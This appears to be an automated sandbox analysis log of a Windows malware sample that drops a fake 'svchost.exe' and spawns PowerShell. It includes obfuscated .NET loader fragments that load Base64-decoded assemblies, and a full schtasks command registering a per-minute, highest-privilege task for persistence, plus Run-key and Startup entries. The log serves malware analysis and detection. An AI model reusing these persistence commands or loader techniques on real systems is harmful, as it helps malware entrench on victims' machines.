                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: file.exeStatic file information: File size 4238848 > 1048576
                Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x40a400
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.DDYxZ9fO4HnwYyEKU3kg5aJrNoY9fFz2zDKgv4SBC5X3bOl5X3c26WvQUnLjPTr,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.b2Zhz2yZImGfj8ogzhWd35jPDnVQ4lizEiYjv3wENhANkBMoZNttLmS1Wng4Z82,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.Ww3VTE1OcV55ItOgrtwc3FIyxSu4O8yF5oT3fIzcBFRRyVMz2OTJBqPScByA7v4,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.kg8WgIFrMTIjPzLXVZYSZ6Q6vNdi0aqzV6NRXZxBAgYiXUrmUoBDV9VQXptMapP,CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.DJt3jyhgcDbDUbh()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fVciQAHa1R64Zp2lFi5ZQi9[2],CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.PixMCeLDzvEnijS(Convert.FromBase64String(fVciQAHa1R64Zp2lFi5ZQi9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: KzE02pfGPuRw4Lp7HTgcV3W System.AppDomain.Load(byte[])
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: _0DrM4fClbwsqX1efoo9bJeu System.AppDomain.Load(byte[])
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: _0DrM4fClbwsqX1efoo9bJeu
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFB4AD200BD pushad ; iretd 0_2_00007FFB4AD200C1
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Code function: 2_2_00007FFB4AD100BD pushad ; iretd 2_2_00007FFB4AD100C1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FFB4AD300BD pushad ; iretd 3_2_00007FFB4AD300C1
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Code function: 4_2_00007FFB4AD200BD pushad ; iretd 4_2_00007FFB4AD200C1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 5_2_00007FFB4AD100BD pushad ; iretd 5_2_00007FFB4AD100C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFB4AC2D2A5 pushad ; iretd 6_2_00007FFB4AC2D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFB4AD400BD pushad ; iretd 6_2_00007FFB4AD400C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFB4AE12316 push 8B485F91h; iretd 6_2_00007FFB4AE1231B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4AC1D2A5 pushad ; iretd 9_2_00007FFB4AC1D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4AD300BD pushad ; iretd 9_2_00007FFB4AD300C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4AE02316 push 8B485F92h; iretd 9_2_00007FFB4AE0231B
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 20_2_00007FFB4AD300BD pushad ; iretd 20_2_00007FFB4AD300C1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FFB4AD100BD pushad ; iretd 23_2_00007FFB4AD100C1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 25_2_00007FFB4AD000BD pushad ; iretd 25_2_00007FFB4AD000C1
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 26_2_00007FFB4AD300BD pushad ; iretd 26_2_00007FFB4AD300C1
                Source: svchost.exe.0.dr, AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.cs | High entropy of concatenated method names: 'lsLMB0k1mzOloo8L67rwcvTn0PZhhQocNpqxrwQ4gZkiPqVhR3', 'PtZKB104eh9CXN8DSCxtOSNrPlKhxbRLgwm4Whiva4Typ1w8lV', 'bOqWL3TZwKGlR8VnMWcZeCD1LgqwmLWtdPNdRcm08gZwO78AgX', 'zQDsgPoZ144gf52sfvMHDOLPS599rx910W7UaPWeEwZXZc5Pt8'
                Source: svchost.exe.0.dr, q8AGBWimCNl26cs.cs | High entropy of concatenated method names: 'pZG5FXTSQuziM5E', 'ZmgSJl8jUzxoda8', '_0KVNAk1dEQ98X0Y', '_9ifKH25q3nDqSHFXQDeQvIYDKqY', 'AQX1Gb1tuXIRXwV6LksEWs67NGQ', 'nrgYWWZT2Lbyyb0vzoXRhEWXsHp', 'FPp3q0Y24Jm0EGBhqrolWxQYYZ9', 'F7Eqbs2zS4TAU12Bv03bK0xZGyE', 'bQLATnzcempqKkBM1uQeYDjVNRT', 'zlm0V5w9judwigvxCjy0rjzLpRP'
                Source: svchost.exe.0.dr, FY4tA6CMaVa4guGqTEmyXIf7xvr3iNtk7Lq6zTl2t38pIELcmF7U9sPLA2fruofSqNCGhqcw5vlPs.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tLd6ptJk33gbJAxVlr6JpGgKPGf0ATucNTSIQhMaD7O9MuOdgL', 'co1TLDrVkALa47756wT5Aih9k9LZYiSN7q6MDJ5Unl8LVnx3we', 'zYV42teDCCOEQB2bAsM1EDFpIYOhXm1hrpHNUyy8ROihue5G9m', '_5BlJwQSBtEeu8F40wMj6UFGwhUot5idctNfpZ5OQnh3qGsDyHd'
                Source: svchost.exe.0.dr, aTyp4zdr7PWoY7yPB1HPKF7KaU9euWm7Dk5Krr5JV4qrSsUHcriImerWCgTplK7zRKiNfoXa3Ge67XHotQU60xBtJ8aXDQD.cs | High entropy of concatenated method names: 'MzhLZg0kBXgQJBqhXKR6IFFTxRk46y82hBGaGM7pgVMvmen2L7OijPvKm0Vpst1lmuuR4i2xyEvIe4YjrkQRtoaQLCr60kB', 'mdtq64VWI9UDHwFjNIujpkSpHcqb4LO7xEWyoj7rCrLsIhN0fpEF3QXczHhsxLIFP8hjCjZ2il0YGkYPo8AKuhjDM07dCeE', 'RaXaMZVo7nmo8HmTXnchTW1c39QnXklSdjqBFSgfJKzReVqH38n29xezdSXahfU3FqHQXja7US46QOKhdH5TqgL1TIyxHxK', 'hpxrO9lHZ6xwksMIczZ8iE5GU7xaEbqbps4bVYrnw56oVy49Ef4dVoJ7zE8Tgx4P4crZN7upY33YIj7h4aZrVedHJvzsGuP', 'H6c0spaFMhUx7BwrU88KHvlbTu7ZdUAw17YWd0AM4TPmmht2e6EUIZKo4ZYLTAOqRhXl3DiKckyfKlECLPHEg4TOr5FaIbb', 'BOLrYdREAu7YNI2QeZKOzwFV4qlmpKZLYslgrUQrRlv33dvDbrenujU6OYVQgt7eGV6CNeowazc2togmGmA3Bz5jesaA9kh', '_5DA7hCEjltuvNA3G7njPLqSUecSRIv7aLkPIMVQpL4tIeev0mGEEWq4mxq57lDnG19RuuUFbYmtqJ6WfS1N7TkHjudGNAGX', 'JqpykSZiAlfZlfFNZltf6ro7xqBSmAN24blsxOvy4xXn8MQlvrcGr3EJn0OzjrbaCA6znZG095GPhMDJJrylTVnLZ8VydXB', 'NBBOvdG7lOl160aIetgUtUcGfJFYBnCMTwZuGCD34YJFUW3QbNPxdign8V4JILQrpn40DjxusIRdyWkiLdFNi2P1NJdpJha', 'BgCpiVaL6yoKrzUeGYjZAZkQXOMbmjTmJGqmt'
                Source: svchost.exe.0.dr, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.cs | High entropy of concatenated method names: 'pV5GNxReLWRbJztxWoN9sFbvGSFZA9fztkgnX', 'IOD7ZNPqydZyQrn5bZEMryMseoy6VAlio52eF', 'R39w72dzlEQ0qHulDtuOonikHSqEMz2NNJoaF', 'F42jEzeOcNEd2Xt58ZYU0JTUk4RuRfxSZIdV6', 'RfDT7ZFrHp324DJgP9zgER7W7kOeiCRZk0fAd', 'jBk8hvmnS9ilhVS4ZvHDvZBpchL7mKgqUuSuA', 'MLSNXeBlz3HyiYeZo2CitJ2y6N1IpQ7vUQpHU', 'SsXmo3zo4c7qvLlX8zcoGrsl7P55Zt2yzDNdR', '_4uT9QBxjLIJ3XEoWHbPcxsOzOyLm5JU7UWKVa', '_5JXNMvFXLbhlzKyb8f6IiKdKM0xqlLinDIokq'
                Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | High entropy of concatenated method names: 'XeZMHJ5Sai1NRcru3Ksv6Ao', 'KzE02pfGPuRw4Lp7HTgcV3W', 'uBURafDYEtltxUsxFTjURcZ', 'XuRibjFAKdTHjD3wsDvnXcY', 'lrGpa5TteqC7tSW6sipLB26', 'XWjMSZoEYV0x7mxEB9Yx8VO', 'EYJIG6PNQGOackyfhbbyQDZ', 'LOZhRT5vgBz7uxt9rznhXXp', 'XKWOYKGBIlqUFPfHLq3g2NZ', 'm44KyzrvV1sefEns8DE0CeX'
                Source: svchost.exe.0.dr, 0m7DX7crYXoCR8NrxmQllWedGea94IvRkI5hOaDUfmiEXgVr36rOaeB.cs | High entropy of concatenated method names: 'QQWfdSG2xS4lD5bdBiEH1OpHPVxK7zcqFJKcXkutmFFjW7lDs4KuW16', 'jOxMM1N6OjprS07QpryZOFHddsoSjtz6kyIjtixcdbs7nE0jBYKdi5S', '_3a4q8G8H205iQsHOGehEiHoyUu9W5Tg8uF0usym5wOEsfoyB9KjBkDa', '_6HtZ7DyNcZ9QQHh5LzZvGDCNX8L3uRTB7yjimyzJa0vQoaG4Vbj6Rg3', 'QB2eNRYXINSW56QGLZXnFf6IpEnxt5NiwqCVzLK5AwXjhxcE5DvHZyQ', 'e7sI67VGSfSlIIKJZphNPZkmILVbC2Kg8g1UvzqyhybiBsnmeImcgtY', 'sGXHqYwXDZULYxK8gSGYFH4cRNvjM5OIf4NawRCEvYC721KExnK2hND', 'kCgCM7V1Aft4M3fuVYkOlVVEVriD7DTHnBI8ucFhzcRT3U8QXzmqy4l', 'OyDSV5z034Qg6wwSXL4llGVREs2vVJxntGddCJt0', 'zkJnnEAC1oKgBY8kIOZK9FA5Ahiu6ZgHhEZO6smM'
                Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.cs | High entropy of concatenated method names: 'VvUamQexaLlDSalFARrQ9qHIOZJfWN1iZ4ag2Lp7oXLz1MRSGNPbsd8Gt5Sr6obsftbYOmO9', 'zG3nb7fsHCEEysakSCoXMtXSWtu6P63EXfJ4trA16aN5TL0jpYPB67f1mF6VV5pI8Vhj3eH7', 'cv6Qnju0tteEsmlaLOWtJAIUXwmlh8WAwx7FxLcPmRTLURaW9D1BRuDD3JBghv32kkwIhqCl', 'WrTjibEG30Y876mYzzNigsYB4cCBy7OQP84LInxtko3aFLXPPwSmYXWBWNILr5vufz9siHuD', 'dHmqVMg6wdknYUDXNdNz9ouCv8mvI06UYX7QIYMIhYj1LrLh6JCxpEwD0hqsQbk2pbkrbJIa', 'gLf7Z007cJpisow', 'uZj9L9WKLXAHIID', 'nf23VrFvRsIEPgv', 'eNb920YNU2Y66xb', '_1e9PhazEhD3rZcw'
                Source: svchost.exe.0.dr, 8KcBCZ9DCxKcKbF0FzfHqT16Ch1DMyJIO0Y5GGZtWjWIgyYVuRr4V5O.cs | High entropy of concatenated method names: 'rmYdAier1qI05Aechiv2ssjdZX9qhSbgOaAJ7uH4HlEgIdQL8TMnynq', 'X6bs1VKVEz', '_7vCg3MX6UP', 'f4ewYMWxqB', 'qGDDMD7OAG'
                Source: svchost.exe.0.dr, ktrFv2sOGwgIA9mekycjF1J3zeN8nu5eTtArKzFhw4oWEqfOdr8PLFPBGGJc0G4nBLrrbImb.cs | High entropy of concatenated method names: 'D6awLwsnT57uNrWDTfeufUJG8coJ97yfrz6Shub48ttMidXaru6dE3ivDB2dT21wtypsvoIR', 'oc58B3p2e5VnNQkOzhef7lvysxQIFgrPZE7JwlyZW4NBEwbfqNgAGIGVhCN5C4euuvceBcCN', '_7hAEB9ijwrrolHvJH8x4xi1rQvEB5e4QwJeG3oIPmOwkKOVvFmTGhBZmbB4Z6pP57exSfdz8', 'j8Vl82dVthVO8INk3TupIUVcYJlhMamIQteNscY8sgRTPoUlGMbTLIKSPGluQlA0F5ikg1iR', '_1Ojp6wqZet', 'qdN8pelKqa', 'p1ATG6liVR', 'fxU4QSNMBd', 'zwpeOddA3A', 'HKX8PLsgAD'

                Persistence and Installation Behavior

                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe (2 occurrences)
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe

                Boot Survival

                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\svchost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk (2 occurrences)
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost (2 occurrences)

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 occurrences)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 occurrences)
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
